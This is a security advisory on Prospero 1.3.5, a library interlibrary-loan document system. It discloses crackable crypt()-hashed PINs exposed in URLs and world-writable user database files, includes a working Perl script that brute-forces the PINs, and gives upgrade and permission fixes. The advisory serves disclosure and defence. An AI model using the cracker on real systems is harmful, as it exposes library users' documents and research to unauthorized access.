COMMAND
Prospero
SYSTEMS AFFECTED
Prospero 1.3.5 CGI
PROBLEM
'darkyoda' found following. Prospero is a Web-based document
delivery system designed as a complement to the Ariel software
system. Ariel is a product of the Research Libraries Group (RLG)
which allows libraries to use the Internet to exchange documents
through interlibrary loan.
Client-side Prospero generates a random 3 or 4 digit PIN that
users enter into a web-based form that grants them access to
documents requested through interlibrary loan. Because the form
uses the GET method, the encrypted PIN is visible in the browser.
A perusal of login.pl reveals that the Perl crypt() method is used
to encrypt the PIN. It is trivial for an attacker to determine
the PIN by brute-force methods; this would allow access to user
documents, allowing malicious users to delete them arbitrarily or
to determine the subject of a user's research.
In addition, login.pl uses 0666 permissions on log and manifest
files. The manifest file is the user database containing PINs and
usernames. Non-prospero users can modify/delete entries in this
file as they please.
Exploit:
#!/usr/bin/perl
#
# crack for prospero PINs
# dY 12.15.00
#
printf("Enter encrypted PIN: ");
chop($passwd = <STDIN>);
$salt = substr($passwd,0,2);
$epin = substr($passwd,2,99);
$lowval = 0;
$highval = 9999;
for ($i = $lowval; $i <= $highval; $i++) {
if (crypt($i, $salt) eq $passwd) {
print("***Unencrypted PIN is: $i\n");
exit(0);
}
}
printf("Sorry, couldn't crack it. Try something > $highval.\n");
exit(0);
SOLUTION
Upgrade to the latest version 1.3.7. Note that author didn't
reviewed the source of this latest version. Clients who cannot
upgrade should change the file permissions in login.pl to 0660
and consider using complex alphanumeric PINs in lieu of the ones
generated by Prospero. Note that this will only slow an
attacker, as the hash could still be brute-forced by an industrial
password cracker, ala John the Ripper.